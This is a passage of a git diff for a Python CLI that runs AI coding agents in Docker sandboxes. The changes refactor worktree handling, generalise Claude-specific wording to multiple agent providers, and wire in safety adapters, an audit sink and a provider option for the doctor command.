compatibility +from scc_cli.application.worktree.models import ( # noqa: F401 + ShellCommand, + WorktreeConfirmAction, + WorktreeConfirmation, + WorktreeCreateRequest, + WorktreeCreateResult, + WorktreeDependencies, + WorktreeEnterOutcome, + WorktreeEnterRequest, + WorktreeListRequest, + WorktreeListResult, + WorktreeResolution, + WorktreeSelectionItem, + WorktreeSelectionPrompt, + WorktreeSelectOutcome, + WorktreeSelectRequest, + WorktreeShellResult, + WorktreeSummary, + WorktreeSwitchOutcome, + WorktreeSwitchRequest, + WorktreeWarning, + WorktreeWarningOutcome, ) - -@dataclass(frozen=True) -class WorktreeDependencies: - """Dependencies for worktree use cases.""" - - git_client: GitClient - dependency_installer: DependencyInstaller - - -@dataclass(frozen=True) -class WorktreeSelectRequest: - """Inputs for selecting a worktree or branch. - - Args: - workspace_path: Repository root path. - include_branches: Whether to include branches without worktrees. - current_dir: Current working directory for current-worktree detection. - selection: Selected item from a prior prompt (if any). - confirm_create: Confirmation response for branch creation. - """ - - workspace_path: Path - include_branches: bool - current_dir: Path - selection: WorktreeSelectionItem | None = None - confirm_create: bool | None = None - - -@dataclass(frozen=True) -class WorktreeSwitchRequest: - """Inputs for switching to a worktree. - - Args: - workspace_path: Repository root path. - target: Target name or shortcut. - oldpwd: Shell OLDPWD value for '-' shortcut. - interactive_allowed: Whether prompts may be shown. - current_dir: Current working directory for current-worktree detection. - selection: Selected item from a prior prompt (if any). - confirm_create: Confirmation response for branch creation. - """ - - workspace_path: Path - target: str | None - oldpwd: str | None - interactive_allowed: bool - current_dir: Path - selection: WorktreeSelectionItem | None = None - confirm_create: bool | None = None - - -@dataclass(frozen=True) -class WorktreeEnterRequest: - """Inputs for entering a worktree in a subshell. - - Args: - workspace_path: Repository root path. - target: Target name or shortcut. - oldpwd: Shell OLDPWD value for '-' shortcut. - interactive_allowed: Whether prompts may be shown. - current_dir: Current working directory for current-worktree detection. - env: Environment mapping for shell resolution. - platform_system: Platform system name (e.g., "Windows", "Linux"). - selection: Selected item from a prior prompt (if any). - """ - - workspace_path: Path - target: str | None - oldpwd: str | None - interactive_allowed: bool - current_dir: Path - env: dict[str, str] - platform_system: str - selection: WorktreeSelectionItem | None = None +# Re-export operations for backward compatibility +from scc_cli.application.worktree.operations import ( # noqa: F401 + _build_shell_result, + _cleanup_partial_worktree, + create_worktree, + enter_worktree_shell, +) +from scc_cli.core.errors import NotAGitRepoError, WorkspaceNotFoundError +from scc_cli.core.exit_codes import EXIT_CANCELLED +from scc_cli.ports.git_client import GitClient +from scc_cli.services.git.branch import get_display_branch +from scc_cli.services.git.worktree import WorktreeInfo def list_worktrees( @@ -648,249 +325,6 @@ def switch_worktree( ) -def enter_worktree_shell( - request: WorktreeEnterRequest, - *, - dependencies: WorktreeDependencies, -) -> WorktreeEnterOutcome: - """Resolve a worktree target into a shell command. - - Invariants: - - Shell resolution mirrors platform defaults. - - Worktree existence is verified before returning a command. - - Raises: - WorkspaceNotFoundError: If the workspace path does not exist. - NotAGitRepoError: If the workspace is not a git repository. - """ - _require_workspace(request.workspace_path) - if not dependencies.git_client.is_git_repo(request.workspace_path): - raise NotAGitRepoError(path=str(request.workspace_path)) - - if request.selection is not None: - return _build_shell_result(request, request.selection) - - if request.target is None: - worktrees = list_worktrees( - WorktreeListRequest( - workspace_path=request.workspace_path, - verbose=False, - current_dir=request.current_dir, - ), - git_client=dependencies.git_client, - ).worktrees - if not worktrees: - return WorktreeWarningOutcome( - WorktreeWarning( - title="No Worktrees", - message="No worktrees found for this repository.", - suggestion="Create one with: scc worktree create ", - ) - ) - return WorktreeSelectionPrompt( - request=_build_select_request( - request_id="worktree-enter", - title="Enter Worktree", - subtitle="Select a worktree to enter", - items=_build_selection_items(worktrees, []), - ) - ) - - if request.target == "-": - if not request.oldpwd: - return WorktreeWarningOutcome( - WorktreeWarning( - title="No Previous Directory", - message="Shell $OLDPWD is not set.", - suggestion="This typically means you haven't changed directories yet.", - ) - ) - selection = WorktreeSelectionItem( - item_id="oldpwd", - branch=Path(request.oldpwd).name, - worktree=WorktreeSummary( - path=Path(request.oldpwd), - branch=Path(request.oldpwd).name, - status="", - is_current=False, - has_changes=False, - staged_count=0, - modified_count=0, - untracked_count=0, - status_timed_out=False, - ), - is_branch_only=False, - ) - return _build_shell_result(request, selection) - - if request.target == "^": - default_branch = dependencies.git_client.get_default_branch(request.workspace_path) - worktrees = list_worktrees( - WorktreeListRequest( - workspace_path=request.workspace_path, - verbose=False, - current_dir=request.current_dir, - ), - git_client=dependencies.git_client, - ).worktrees - selected = None - for worktree in worktrees: - if worktree.branch == default_branch or worktree.branch in {"main", "master"}: - selected = worktree - break - if not selected: - return WorktreeWarningOutcome( - WorktreeWarning( - title="Main Branch Not Found", - message=f"No worktree found for main branch ({default_branch}).", - suggestion="The main worktree may be in a different location.", - ) - ) - selection = WorktreeSelectionItem( - item_id=f"worktree:{selected.path}", - branch=selected.branch or selected.path.name, - worktree=selected, - is_branch_only=False, - ) - return _build_shell_result(request, selection) - - matched, _matches = dependencies.git_client.find_worktree_by_query( - request.workspace_path, request.target - ) - if not matched: - return WorktreeWarningOutcome( - WorktreeWarning( - title="Worktree Not Found", - message=f"No worktree matching '{request.target}'.", - suggestion="Run 'scc worktree list' to see available worktrees.", - ) - ) - selection = WorktreeSelectionItem( - item_id=f"worktree:{matched.path}", - branch=matched.branch or Path(matched.path).name, - worktree=WorktreeSummary( - path=Path(matched.path), - branch=matched.branch, - status=matched.status, - is_current=False, - has_changes=matched.has_changes, - staged_count=matched.staged_count, - modified_count=matched.modified_count, - untracked_count=matched.untracked_count, - status_timed_out=matched.status_timed_out, - ), - is_branch_only=False, - ) - return _build_shell_result(request, selection) - - -def create_worktree( - request: WorktreeCreateRequest, - *, - dependencies: WorktreeDependencies, -) -> WorktreeCreateResult: - """Create a worktree using git and dependency installer ports. - - Invariants: - - Uses the same branch naming and lock behavior as the CLI. - - Cleans up partially created worktrees on failure. - - Raises: - NotAGitRepoError: If the workspace is not a git repository. - WorktreeCreationError: If worktree creation fails. - """ - if not dependencies.git_client.is_git_repo(request.workspace_path): - raise NotAGitRepoError(path=str(request.workspace_path)) - - safe_name = sanitize_branch_name(request.name) - if not safe_name: - raise ValueError(f"Invalid worktree name: {request.name!r}") - - branch_name = f"{WORKTREE_BRANCH_PREFIX}{safe_name}" - worktree_base = request.workspace_path.parent / f"{request.workspace_path.name}-worktrees" - worktree_path = worktree_base / safe_name - - lock_file = lock_path("worktree", request.workspace_path) - with file_lock(lock_file): - if worktree_path.exists(): - raise WorktreeCreationError( - name=safe_name, - user_message=f"Worktree already exists: {worktree_path}", - suggested_action="Use existing worktree, remove it first, or choose a different name", - ) - - base_branch = request.base_branch or dependencies.git_client.get_default_branch( - request.workspace_path - ) - - if dependencies.git_client.has_remote(request.workspace_path): - dependencies.git_client.fetch_branch(request.workspace_path, base_branch) - - worktree_created = False - try: - dependencies.git_client.add_worktree( - request.workspace_path, - worktree_path, - branch_name, - base_branch, - ) - worktree_created = True - - dependencies_installed = None - if request.install_dependencies: - install_result = dependencies.dependency_installer.install(worktree_path) - if install_result.attempted and not install_result.success: - raise WorktreeCreationError( - name=safe_name, - user_message="Dependency install failed for the new worktree", - suggested_action="Install dependencies manually and retry if needed", - ) - if install_result.attempted: - dependencies_installed = install_result.success - - return WorktreeCreateResult( - worktree_path=worktree_path, - worktree_name=safe_name, - branch_name=branch_name, - base_branch=base_branch, - dependencies_installed=dependencies_installed, - ) - except KeyboardInterrupt: - if worktree_created or worktree_path.exists(): - _cleanup_partial_worktree( - request.workspace_path, worktree_path, dependencies.git_client - ) - raise - except WorktreeCreationError: - if worktree_created or worktree_path.exists(): - _cleanup_partial_worktree( - request.workspace_path, worktree_path, dependencies.git_client - ) - raise - except Exception as exc: - if worktree_created or worktree_path.exists(): - _cleanup_partial_worktree( - request.workspace_path, worktree_path, dependencies.git_client - ) - raise WorktreeCreationError( - name=safe_name, - user_message=f"Failed to create worktree: {safe_name}", - suggested_action="Check if the branch already exists or if there are uncommitted changes", - command=str(getattr(exc, "cmd", "")) or None, - ) from exc - - -def _cleanup_partial_worktree(repo_path: Path, worktree_path: Path, git_client: GitClient) -> None: - try: - git_client.remove_worktree(repo_path, worktree_path, force=True) - except Exception: - pass - try: - git_client.prune_worktrees(repo_path) - except Exception: - pass - - def _require_workspace(workspace_path: Path) -> None: if not workspace_path.exists(): raise WorkspaceNotFoundError(path=str(workspace_path)) @@ -1010,35 +444,3 @@ def _summaries_from_matches(matches: Sequence[WorktreeInfo]) -> list[WorktreeSum ) ) return summaries - - -def _build_shell_result( - request: WorktreeEnterRequest, - selection: WorktreeSelectionItem, -) -> WorktreeShellResult | WorktreeWarningOutcome: - if not selection.path: - raise ValueError("Selection must include a worktree path") - - if not selection.path.exists(): - return WorktreeWarningOutcome( - WorktreeWarning( - title="Worktree Missing", - message=f"Worktree path does not exist: {selection.path}", - suggestion="The worktree may have been removed. Run 'scc worktree prune'.", - ) - ) - - env = dict(request.env) - worktree_name = selection.branch or selection.path.name - env["SCC_WORKTREE"] = worktree_name - - if request.platform_system == "Windows": - shell = env.get("COMSPEC", "cmd.exe") - else: - shell = env.get("SHELL", "/bin/bash") - - return WorktreeShellResult( - shell_command=ShellCommand(argv=[shell], workdir=selection.path, env=env), - worktree_path=selection.path, - worktree_name=worktree_name, - ) diff --git a/src/scc_cli/audit/__init__.py b/src/scc_cli/audit/__init__.py index 947fefe..d7013c6 100644 --- a/src/scc_cli/audit/__init__.py +++ b/src/scc_cli/audit/__init__.py @@ -1,6 +1,6 @@ """Provide plugin audit module for SCC. -Expose functionality for auditing Claude Code plugins, +Expose functionality for auditing plugins, including manifest parsing, file reading, and plugin discovery. """ diff --git a/src/scc_cli/audit/reader.py b/src/scc_cli/audit/reader.py index 12443da..acd8a7b 100644 --- a/src/scc_cli/audit/reader.py +++ b/src/scc_cli/audit/reader.py @@ -2,7 +2,7 @@ Implement file system operations for: - Reading manifest files from plugin directories -- Discovering installed plugins from the Claude Code registry +- Discovering installed plugins from the agent registry - Creating audit results for plugins """ @@ -88,7 +88,7 @@ def read_plugin_manifests(plugin_dir: Path) -> PluginManifests: def discover_installed_plugins(claude_dir: Path) -> list[dict[str, Any]]: - """Discover installed plugins from the Claude Code registry. + """Discover installed plugins from the agent registry. Args: claude_dir: Path to the .claude directory (typically ~/.claude). diff --git a/src/scc_cli/bootstrap.py b/src/scc_cli/bootstrap.py index 25e41d2..248c0de 100644 --- a/src/scc_cli/bootstrap.py +++ b/src/scc_cli/bootstrap.py @@ -5,20 +5,34 @@ from dataclasses import dataclass from functools import lru_cache +from scc_cli.adapters.claude_agent_provider import ClaudeAgentProvider from scc_cli.adapters.claude_agent_runner import ClaudeAgentRunner +from scc_cli.adapters.claude_safety_adapter import ClaudeSafetyAdapter +from scc_cli.adapters.claude_settings import ( + merge_mcp_servers, # noqa: F401 — re-exported public API +) +from scc_cli.adapters.codex_agent_provider import CodexAgentProvider +from scc_cli.adapters.codex_agent_runner import CodexAgentRunner +from scc_cli.adapters.codex_safety_adapter import CodexSafetyAdapter +from scc_cli.adapters.docker_runtime_probe import DockerRuntimeProbe from scc_cli.adapters.docker_sandbox_runtime import DockerSandboxRuntime +from scc_cli.adapters.local_audit_event_sink import LocalAuditEventSink from scc_cli.adapters.local_config_store import LocalConfigStore from scc_cli.adapters.local_dependency_installer import LocalDependencyInstaller from scc_cli.adapters.local_doctor_runner import LocalDoctorRunner from scc_cli.adapters.local_filesystem import LocalFilesystem from scc_cli.adapters.local_git_client import LocalGitClient +from scc_cli.adapters.oci_sandbox_runtime import OciSandboxRuntime from scc_cli.adapters.personal_profile_service_local import LocalPersonalProfileService from scc_cli.adapters.requests_fetcher import RequestsFetcher from scc_cli.adapters.session_store_json import JsonSessionStore from scc_cli.adapters.system_clock import SystemClock from scc_cli.adapters.zip_archive_writer import ZipArchiveWriter +from scc_cli.core.safety_engine import DefaultSafetyEngine +from scc_cli.ports.agent_provider import AgentProvider from scc_cli.ports.agent_runner import AgentRunner from scc_cli.ports.archive_writer import ArchiveWriter +from scc_cli.ports.audit_event_sink import AuditEventSink from scc_cli.ports.clock import Clock from scc_cli.ports.config_store import ConfigStore from scc_cli.ports.dependency_installer import DependencyInstaller @@ -27,6 +41,9 @@ from scc_cli.ports.git_client import GitClient from scc_cli.ports.personal_profile_service import PersonalProfileService from scc_cli.ports.remote_fetcher import RemoteFetcher +from scc_cli.ports.runtime_probe import RuntimeProbe +from scc_cli.ports.safety_adapter import SafetyAdapter +from scc_cli.ports.safety_engine import SafetyEngine from scc_cli.ports.sandbox_runtime import SandboxRuntime from scc_cli.ports.session_store import SessionStore @@ -41,17 +58,39 @@ class DefaultAdapters: remote_fetcher: RemoteFetcher clock: Clock agent_runner: AgentRunner + agent_provider: AgentProvider sandbox_runtime: SandboxRuntime personal_profile_service: PersonalProfileService doctor_runner: DoctorRunner archive_writer: ArchiveWriter config_store: ConfigStore + audit_event_sink: AuditEventSink | None = None + codex_agent_provider: AgentProvider | None = None + runtime_probe: RuntimeProbe | None = None + safety_engine: SafetyEngine | None = None + codex_agent_runner: AgentRunner | None = None + claude_safety_adapter: SafetyAdapter | None = None + codex_safety_adapter: SafetyAdapter | None = None @lru_cache(maxsize=1) def get_default_adapters() -> DefaultAdapters: """Return the default adapter wiring for SCC.""" + probe = DockerRuntimeProbe() + info = probe.probe() + + # Select sandbox runtime based on probe result. + sandbox_runtime: SandboxRuntime + if info.preferred_backend == "oci": + sandbox_runtime = OciSandboxRuntime(probe=probe) + else: + sandbox_runtime = DockerSandboxRuntime(probe=probe) + + # Shared engine and sink — reused by safety_engine field and both adapters. + engine = DefaultSafetyEngine() + sink = LocalAuditEventSink() + return DefaultAdapters( filesystem=LocalFilesystem(), git_client=LocalGitClient(), @@ -59,11 +98,19 @@ def get_default_adapters() -> DefaultAdapters: remote_fetcher=RequestsFetcher(), clock=SystemClock(), agent_runner=ClaudeAgentRunner(), - sandbox_runtime=DockerSandboxRuntime(), + agent_provider=ClaudeAgentProvider(), + codex_agent_runner=CodexAgentRunner(), + sandbox_runtime=sandbox_runtime, personal_profile_service=LocalPersonalProfileService(), doctor_runner=LocalDoctorRunner(), archive_writer=ZipArchiveWriter(), config_store=LocalConfigStore(), + audit_event_sink=sink, + codex_agent_provider=CodexAgentProvider(), + runtime_probe=probe, + safety_engine=engine, + claude_safety_adapter=ClaudeSafetyAdapter(engine=engine, audit_sink=sink), + codex_safety_adapter=CodexSafetyAdapter(engine=engine, audit_sink=sink), ) diff --git a/src/scc_cli/cli.py b/src/scc_cli/cli.py index b278748..60972d2 100644 --- a/src/scc_cli/cli.py +++ b/src/scc_cli/cli.py @@ -1,8 +1,8 @@ #!/usr/bin/env python3 """ -SCC - Sandboxed Claude CLI +SCC - Sandboxed Coding CLI -A command-line tool for safely running Claude Code in Docker sandboxes +A command-line tool for safely running AI coding agents in Docker sandboxes with team-specific configurations and worktree management. This module serves as the thin orchestrator that composes commands from: @@ -37,6 +37,7 @@ from .commands.launch import start from .commands.org import org_app from .commands.profile import profile_app +from .commands.provider import provider_app from .commands.reset import reset_cmd from .commands.support import support_app from .commands.team import team_app @@ -57,7 +58,7 @@ app = typer.Typer( name="scc-cli", - help="Safely run Claude Code with team configurations and worktree management.", + help="Safely run AI coding agents with team configurations and worktree management.", no_args_is_help=False, rich_markup_mode="rich", context_settings={"help_option_names": ["-h", "--help"]}, @@ -93,9 +94,9 @@ def main_callback( ), ) -> None: """ - [bold cyan]SCC[/bold cyan] - Sandboxed Claude CLI + [bold cyan]SCC[/bold cyan] - Sandboxed Coding CLI - Safely run Claude Code in Docker sandboxes with team configurations. + Safely run AI coding agents in Docker sandboxes with team configurations. """ state.debug = debug @@ -216,6 +217,7 @@ def main_callback( # Configuration commands app.add_typer(team_app, name="team", rich_help_panel=PANEL_CONFIG) app.add_typer(profile_app, name="profile", rich_help_panel=PANEL_CONFIG) +app.add_typer(provider_app, name="provider", rich_help_panel=PANEL_CONFIG) app.command(name="setup", rich_help_panel=PANEL_CONFIG)(setup_cmd) app.command(name="config", rich_help_panel=PANEL_CONFIG)(config_cmd) app.command(name="init", rich_help_panel=PANEL_CONFIG)(init_cmd) diff --git a/src/scc_cli/commands/admin.py b/src/scc_cli/commands/admin.py index 6ef29c4..404d9eb 100644 --- a/src/scc_cli/commands/admin.py +++ b/src/scc_cli/commands/admin.py @@ -194,7 +194,7 @@ def status_cmd( org_config = config.load_cached_org_config() # Get running containers - running_containers = docker.list_running_sandboxes() + running_containers = docker.list_running_scc_containers() # Get current workspace workspace_path = Path.cwd() @@ -289,8 +289,22 @@ def doctor_cmd( quick: bool = typer.Option(False, "--quick", "-q", help="Quick status only"), json_output: bool = typer.Option(False, "--json", help="Output as JSON"), pretty: bool = typer.Option(False, "--pretty", help="Pretty-print JSON (implies --json)"), + provider: str | None = typer.Option( + None, "--provider", help="Check readiness for a specific provider" + ), ) -> None: """Check prerequisites and system health.""" + # Validate --provider against KNOWN_PROVIDERS + if provider is not None: + from scc_cli.core.provider_resolution import KNOWN_PROVIDERS + + if provider not in KNOWN_PROVIDERS: + console.print( + f"[bold red]Error:[/bold red] Unknown provider '{provider}'. " + f"Known providers: {', '.join(KNOWN_PROVIDERS)}" + ) + raise typer.Exit(2) + workspace_path = Path(workspace).expanduser().resolve() if workspace else None # --pretty implies --json @@ -300,7 +314,7 @@ def doctor_cmd( if json_output: with json_output_mode(): - result = doctor.run_doctor(workspace_path) + result = doctor.run_doctor(workspace_path, provider_id=provider) data = doctor.build_doctor_json_data(result) envelope = build_envelope(Kind.DOCTOR_REPORT, data=data, ok=result.all_ok) print_json(envelope) @@ -309,12 +323,12 @@ def doctor_cmd( raise typer.Exit(0) with Status("[cyan]Running health checks...[/cyan]", console=console, spinner=Spinners.DEFAULT): - result = doctor.run_doctor(workspace_path) + result = doctor.run_doctor(workspace_path, provider_id=provider) if quick: doctor.render_quick_status(console, result) else: - doctor.render_doctor_results(console, result) + doctor.render_doctor_results(console, result, provider_id=provider) # Return proper exit code if not result.all_ok: @@ -357,7 +371,7 @@ def statusline_cmd( ), show: bool = typer.Option(False, "--show", "-s", help="Show current status line config"), ) -> None: - """Configure Claude Code status line to show git worktree info. + """Configure status line to show git worktree info. The status line displays: Model | Git branch/worktree | Context usage | Cost @@ -459,13 +473,13 @@ def statusline_cmd( "[bold]Model[/bold] | [cyan]🌿 branch[/cyan] or [magenta]⎇ worktree[/magenta]:branch | " "[green]Ctx %[/green] | [yellow]$cost[/yellow][/dim]" ) - console.print("[dim]Restart Claude Code sandbox to see the changes.[/dim]") + console.print("[dim]Restart sandbox to see the changes.[/dim]") else: console.print( create_warning_panel( "Installation Failed", "Could not inject statusline into Docker sandbox volume.", - "Ensure Docker Desktop is running", + "Ensure Docker is running", ) ) raise typer.Exit(1) @@ -475,7 +489,7 @@ def statusline_cmd( console.print( create_info_panel( "Status Line", - "Configure a custom status line for Claude Code.", + "Configure a custom status line.", "Use --install to set up, --show to view, --uninstall to remove", ) ) diff --git a/src/scc_cli/commands/audit.py b/src/scc_cli/commands/audit.py index 3486f5a..198d118 100644 --- a/src/scc_cli/commands/audit.py +++ b/src/scc_cli/commands/audit.py @@ -1,6 +1,6 @@ """Provide CLI commands for plugin audit functionality. -Audit installed Claude Code plugins via the `scc audit plugins` command, +Audit installed plugins via the `scc audit plugins` command, including manifest validation and MCP server/hooks discovery. """ @@ -17,7 +17,7 @@ from rich.text import Text from scc_cli.audit.reader import audit_all_plugins -from scc_cli.core.constants import AGENT_CONFIG_DIR +from scc_cli.core.provider_registry import get_runtime_spec from scc_cli.models.plugin_audit import ( AuditOutput, ManifestStatus, @@ -35,9 +35,9 @@ ) -def get_claude_dir() -> Path: - """Get the Claude Code directory path.""" - return Path.home() / AGENT_CONFIG_DIR +def get_provider_config_dir(provider_id: str = "claude") -> Path: + """Get the agent config directory path for a provider.""" + return Path.home() / get_runtime_spec(provider_id).config_dir def format_status(status: str) -> str: @@ -226,7 +226,7 @@ def audit_plugins_cmd( help="Output as JSON with schemaVersion for CI integration.", ), ) -> None: - """Audit installed Claude Code plugins. + """Audit installed plugins. Shows manifest status, MCP servers, and hooks for all installed plugins. @@ -234,7 +234,7 @@ def audit_plugins_cmd( - 0: All plugins parsed successfully (or no plugins installed) - 1: One or more plugins have malformed or unreadable manifests """ - claude_dir = get_claude_dir() + claude_dir = get_provider_config_dir() output = audit_all_plugins(claude_dir) if as_json: diff --git a/src/scc_cli/commands/config.py b/src/scc_cli/commands/config.py index 97b847f..e3a64c3 100644 --- a/src/scc_cli/commands/config.py +++ b/src/scc_cli/commands/config.py @@ -1,32 +1,40 @@ -"""Provide CLI commands for managing teams, configuration, and setup.""" +"""Provide CLI commands for managing teams, configuration, and setup. + +Validation logic lives in config_validate.py; paths/exceptions in +config_inspect.py. This module keeps config_cmd, setup_cmd, _config_explain, +and small helpers. + +Re-exports public names for backward compatibility. +""" -import json from dataclasses import dataclass from pathlib import Path from typing import Annotated, Any import typer -from rich import box -from rich.table import Table from .. import config, setup from ..application.compute_effective_config import ( - BlockedItem, ConfigDecision, - DelegationDenied, EffectiveConfig, compute_effective_config, ) from ..cli_common import console, handle_errors from ..core import personal_profiles -from ..core.enums import NetworkPolicy, RequestSource +from ..core.enums import NetworkPolicy from ..core.exit_codes import EXIT_USAGE from ..core.network_policy import collect_proxy_env, is_more_or_equal_restrictive -from ..maintenance import get_paths, get_total_size -from ..panels import create_error_panel, create_info_panel, create_success_panel +from ..panels import create_error_panel, create_info_panel +from ..ports.config_models import NormalizedOrgConfig from ..source_resolver import ResolveError, resolve_source -from ..stores.exception_store import RepoStore, UserStore -from ..utils.ttl import format_relative + +# Re-export extracted symbols for backward compatibility +from .config_inspect import _config_paths, _render_active_exceptions +from .config_validate import ( + _config_validate, + _render_blocked_items, + _render_denied_additions, +) # ───────────────────────────────────────────────────────────────────────────── # Config App @@ -81,25 +89,15 @@ def setup_cmd( help="Fail fast instead of prompting for missing setup inputs", ), ) -> None: - """Run initial setup wizard. - - Examples: - scc setup # Interactive wizard - scc setup --standalone # Standalone mode - scc setup --org github:acme/config --profile dev # Non-interactive with shorthand - scc setup --org-url --team dev # Non-interactive (legacy) - """ + """Run initial setup wizard.""" if reset: setup.reset_setup(console) return - # Handle --profile/--team alias (prefer --profile) selected_profile = profile or team - # Handle --org/--org-url (prefer --org) resolved_url: str | None = None if org: - # Resolve shorthand to URL result = resolve_source(org) if isinstance(result, ResolveError): console.print( @@ -124,7 +122,6 @@ def setup_cmd( ) raise typer.Exit(EXIT_USAGE) - # Non-interactive mode if org source or standalone specified if resolved_url or standalone: success = setup.run_non_interactive_setup( console, @@ -137,7 +134,6 @@ def setup_cmd( raise typer.Exit(1) return - # Run the setup wizard (--quick flag is a no-op for now, wizard handles all cases) setup.run_setup_wizard(console) @@ -173,20 +169,7 @@ def config_cmd( typer.Option("--show-env", help="Show XDG environment variables (for paths action)."), ] = False, ) -> None: - """View or edit configuration. - - Examples: - scc config --show # Show all config - scc config get selected_profile # Get specific key - scc config set hooks.enabled true # Set a value - scc config --edit # Open in editor - scc config explain # Explain effective config - scc config explain --field plugins # Explain only plugins - scc config validate # Validate .scc.yaml - scc config paths # Show SCC file locations - scc config paths --json # Show paths as JSON - """ - # Handle action-based commands + """View or edit configuration.""" if action == "paths": _config_paths(json_output=json_output, show_env=show_env) return @@ -242,7 +225,6 @@ def config_cmd( ) return - # Handle --show and --edit flags if show or action == "show": cfg = config.load_user_config() console.print( @@ -269,7 +251,6 @@ def _config_set(key: str, value: str) -> None: """Set a configuration value by dotted key path.""" cfg = config.load_user_config() - # Parse dotted key path (e.g., "hooks.enabled") keys = key.split(".") obj = cfg for k in keys[:-1]: @@ -277,7 +258,6 @@ def _config_set(key: str, value: str) -> None: obj[k] = {} obj = obj[k] - # Parse value (handle booleans and numbers) parsed_value: bool | int | str if value.lower() == "true": parsed_value = True @@ -297,7 +277,6 @@ def _config_get(key: str) -> None: """Get a configuration value by dotted key path.""" cfg = config.load_user_config() - # Navigate dotted key path keys = key.split(".") obj = cfg for k in keys: @@ -307,7 +286,6 @@ def _config_get(key: str) -> None: console.print(f"[yellow]Key '{key}' not found[/yellow]") return - # Display value if isinstance(obj, dict): console.print_json(data=obj) else: @@ -320,31 +298,22 @@ def _config_explain( team_override: str | None = None, json_output: bool = False, ) -> None: - """Explain the effective configuration with source attribution. - - Shows: - - Effective config values and where they came from - - Blocked items and the patterns that blocked them - - Denied additions and why they were denied - """ - # Load org config + """Explain the effective configuration with source attribution.""" org_config = config.load_cached_org_config() if not org_config: console.print("[red]No organization config found. Run 'scc setup' first.[/red]") raise typer.Exit(1) - # Get selected profile/team team = team_override or config.get_selected_profile() if not team: console.print("[red]No team selected. Run 'scc team switch ' first.[/red]") raise typer.Exit(1) - # Determine workspace path ws_path = Path(workspace_path) if workspace_path else Path.cwd() - # Compute effective config + normalized = NormalizedOrgConfig.from_dict(org_config) effective = compute_effective_config( - org_config=org_config, + org_config=normalized, team_name=team, workspace_path=ws_path, ) @@ -377,7 +346,6 @@ def _config_explain( print_json(envelope) return - # Build output console.print( create_info_panel( "Effective Configuration", @@ -388,22 +356,15 @@ def _config_explain( console.print() _render_enforcement_status(enforcement_status, field_filter) - - # Show decisions (config values with source attribution) _render_config_decisions(effective, field_filter) - - # Show personal profile additions (if any) _render_personal_profile(ws_path, field_filter) - # Show blocked items if effective.blocked_items and (not field_filter or field_filter == "blocked"): _render_blocked_items(effective.blocked_items) - # Show denied additions if effective.denied_additions and (not field_filter or field_filter == "denied"): _render_denied_additions(effective.denied_additions) - # Show active exceptions if not field_filter or field_filter == "exceptions": expired_count = _render_active_exceptions() if expired_count > 0: @@ -523,11 +484,11 @@ def _collect_advisory_warnings( f"({team_network_policy} < {default_network_policy})." ) - if effective_network_policy == NetworkPolicy.CORP_PROXY_ONLY.value: + if effective_network_policy == NetworkPolicy.WEB_EGRESS_ENFORCED.value: proxy_env = collect_proxy_env() if not proxy_env: warnings.append( - "network_policy is corp-proxy-only but no proxy env vars are set " + "network_policy is web-egress-enforced but no proxy env vars are set " "(HTTP_PROXY/HTTPS_PROXY/NO_PROXY)." ) @@ -546,192 +507,21 @@ def _render_advisory_warnings(warnings: list[str], field_filter: str | None) -> console.print() -def _config_validate( - *, - workspace_path: str | None, - team_override: str | None, - json_output: bool, -) -> None: - from ..core.exit_codes import EXIT_CONFIG, EXIT_GOVERNANCE, EXIT_SUCCESS - from ..json_output import build_envelope - from ..kinds import Kind - from ..output_mode import print_json - - errors: list[str] = [] - warnings: list[str] = [] - - org_config = config.load_cached_org_config() - if not org_config: - errors.append("No organization config found. Run 'scc setup' first.") - - team = team_override or config.get_selected_profile() - if not team: - errors.append("No team selected. Run 'scc team switch ' first.") - - ws_path = Path(workspace_path) if workspace_path else Path.cwd() - config_file = ws_path / config.PROJECT_CONFIG_FILE - - project_config: dict[str, Any] | None = None - if not errors and team and org_config: - profiles = org_config.get("profiles", {}) - if team not in profiles: - errors.append(f"Team '{team}' not found in org config.") - - if not errors: - try: - project_config = config.read_project_config(ws_path) - except ValueError as exc: - errors.append(str(exc)) - - if not errors and project_config is None: - if not config_file.exists(): - errors.append(f"No .scc.yaml found at {config_file}") - else: - errors.append(f"{config_file} is empty.") - - blocked_items: list[dict[str, Any]] = [] - denied_additions: list[dict[str, Any]] = [] - unknown_keys: list[str] = [] - - if not errors and project_config and org_config: - allowed_keys = {"additional_plugins", "additional_mcp_servers", "session"} - unknown_keys = sorted([key for key in project_config if key not in allowed_keys]) - if unknown_keys: - warnings.append("Unknown keys in .scc.yaml (ignored): " + ", ".join(unknown_keys)) - - project_session = project_config.get("session", {}) - if "auto_resume" in project_session: - warnings.append("session.auto_resume is advisory only and not enforced.") - - effective = compute_effective_config( - org_config=org_config, - team_name=team, - project_config=project_config, - ) - - project_plugins = set(project_config.get("additional_plugins", [])) - project_mcp_tokens: set[str] = set() - for server in project_config.get("additional_mcp_servers", []): - name = server.get("name") - url = server.get("url") - if name: - project_mcp_tokens.add(name) - if url: - project_mcp_tokens.add(url) - - for blocked in effective.blocked_items: - if blocked.item not in project_plugins and blocked.item not in project_mcp_tokens: - continue - blocked_items.append( - { - "item": blocked.item, - "blocked_by": blocked.blocked_by, - "source": blocked.source, - "target_type": blocked.target_type, - } - ) - errors.append(f"{blocked.item} blocked by {blocked.blocked_by} ({blocked.source})") - - for denied in effective.denied_additions: - if denied.requested_by != RequestSource.PROJECT: - continue - denied_additions.append( - { - "item": denied.item, - "requested_by": denied.requested_by, - "reason": denied.reason, - "target_type": denied.target_type, - } - ) - errors.append(f"{denied.item} denied ({denied.reason})") - - ok = not errors - exit_code = EXIT_SUCCESS if ok else EXIT_CONFIG - if denied_additions or blocked_items: - exit_code = EXIT_GOVERNANCE - - if json_output: - data = { - "workspace_path": str(ws_path), - "team": team, - "project_config_path": str(config_file), - "project_config_found": project_config is not None, - "blocked_items": blocked_items, - "denied_additions": denied_additions, - "unknown_keys": unknown_keys, - } - envelope = build_envelope( - Kind.CONFIG_VALIDATE, - data=data, - ok=ok, - errors=errors, - warnings=warnings, - ) - print_json(envelope) - raise typer.Exit(exit_code) - - if ok: - team_label = team or "unknown" - console.print( - create_success_panel( - "Project Config Valid", - { - "Workspace": str(ws_path), - "Config": str(config_file), - "Team": team_label, - }, - ) - ) - else: - console.print( - create_error_panel( - "Project Config Invalid", - errors[0], - "Run 'scc config explain --field denied' for details.", - ) - ) - - if blocked_items: - console.print("[bold red]Blocked Items[/bold red]") - for item in blocked_items: - console.print( - f" [red]✗[/red] {item['item']} [dim](blocked by {item['blocked_by']})[/dim]" - ) - console.print() - - if denied_additions: - console.print("[bold yellow]Denied 